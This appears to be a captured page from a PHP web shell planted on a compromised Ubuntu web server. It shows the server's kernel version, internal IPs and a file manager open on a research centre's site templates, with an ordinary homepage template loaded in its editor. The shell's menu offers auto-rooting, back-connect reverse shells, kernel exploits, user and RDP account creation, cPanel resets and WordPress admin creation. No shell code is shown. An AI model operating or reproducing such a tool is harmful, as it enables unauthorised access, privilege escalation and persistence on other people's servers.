Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd-org-old /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
about.html
6.19
KB
-rw-r--r--
contactus.html
5.85
KB
-rw-r--r--
desktop.ini
41
B
-rw-r--r--
events.html
3.14
KB
-rw-r--r--
index.html
5.5
KB
-rw-r--r--
joinus.html
4.18
KB
-rw-r--r--
meetourteam.html
5.05
KB
-rw-r--r--
partner.html
3.59
KB
-rw-r--r--
products.html
4.83
KB
-rw-r--r--
services.html
3.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Centre for Intelligent Product Development | Turning India into a Product Nation</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}"> </head> <body> <header> <div class="color-strip"> <img src="{{ url_for('static', filename='MakeInIndia.png') }}" alt="CiPD Make"> </div> <div class="logo6"> <img src="{{ url_for('static', filename='IIIT-Delhilogo.svg') }}" alt="IIIT Delhi Logo"> </div> <div class="logo"> <a href="/"> <img src="{{ url_for('static', filename='CiPDlogo.png') }}" alt="CiPD Logo"> </a> </div> <nav class="homepage-content"> <ul class="homepage"> <li><a href="/partner" onmouseover="animateText(this)">Partners</a></li> <li><a href="/team" onmouseover="animateText(this)">Team</a></li> <li><a href="/join" onmouseover="animateText(this)">JoinUs</a></li> <!-- Add more links as needed --> </ul> </nav> <nav class="right-align"> <ul class="homepage"> <li><a href="/about" onmouseover="animateText(this)">About us</a></li> <li><a href="/service" onmouseover="animateText(this)">Services</a></li> <li><a href="/product" onmouseover="animateText(this)">Product Portfolio</a></li> <li><a href="/event" onmouseover="animateText(this)">Events</a></li> </ul> </nav> </header> <div class="cipdwebsiteabout6"> <div class="cipdwebsiteabout8"> {% for banner in banners %} {% if banner.type == 'video' %} <video width="100%" height="400" autoplay loop muted playsinline style="display: none;"> <source src="{{ url_for('static', filename=banner.location) }}" type="video/mp4"> Your browser does not support the video tag. </video> {% else %} <img src="{{ url_for('static', filename=banner.location) }}" alt="Banner Image" style="width:100%; height:400px; display: none;"> {% endif %} {% endfor %} </div> </div> <script src="{{ url_for('static', filename='script.js') }}"></script> <br><br><br><br><br><br> <body> <div class="cipdwebsiteinsights"> <h1>Insights</h1> <div class="cipdwebsitegraphic1"> <img src="{{ url_for('static', filename='insight_arrow.png') }}" alt="Animated GIF"> </div> </div> <div class="cipddo1"> <div class="image-container"> <img src="{{ url_for('static', filename='press_release.jpg') }}" alt="press_release"> <div class="text-box"> <p><b>IIIT-Delhi</b> established the <b>CiPD</b> that will focus on creating<b> innovative, high-tech products</b> that are groundbreaking and incorporate emerging technologies.</p> </div> </div> <div class="image-container"> <img src="{{ url_for('static', filename='waterpump.png') }}" alt="waterpump"> <div class="text-box"> <p><b>Water Management Solution</b><br>The project aims to develop a <b>comprehensive, scalable, and efficient</b> water management solution through a participatory design approach. </p> </div> </div> <div class="image-container"> <img src="{{ url_for('static', filename='tablet.png') }}" alt="tablet"> <div class="text-box"> <p><b>Our partner, EPIC Foundation</b> launched Milky Way tablet on 13 February 2024. It is the <b>first</b> ever designed-in-India <b>AI-powered education tablet.</b> </p> </div> </div> </div> <div class="cipdwebsiteabout1"> <!-- Your video slide --> <video autoplay loop muted playsinline width="100%" height="600"> <source src="{{ url_for('static', filename='CIPD_Main.mp4') }}" alt="video" type="video/mp4"> </video> </div> </body> <footer> <div class="footer-content"> <div class="map-container"> <iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14019.183566049558!2d77.2731762!3d28.5458541!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390ce3e564daac1d%3A0x2c582e340e7bc556!2sIndraprastha%20Institute%20of%20Information%20Technology%20Delhi!5e0!3m2!1sen!2sin!4v1711054108005!5m2!1sen!2sin" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> <div class="contact-info"> <a href="/contactus">Contact Us</a> <a href="https://iiitd.ac.in/careers/ra">Click to check Available Positions</a> </div> </div> <p>Copyright © 2024 Centre for Intelligent Product Development. All rights reserved.</p> </footer> </html>
Close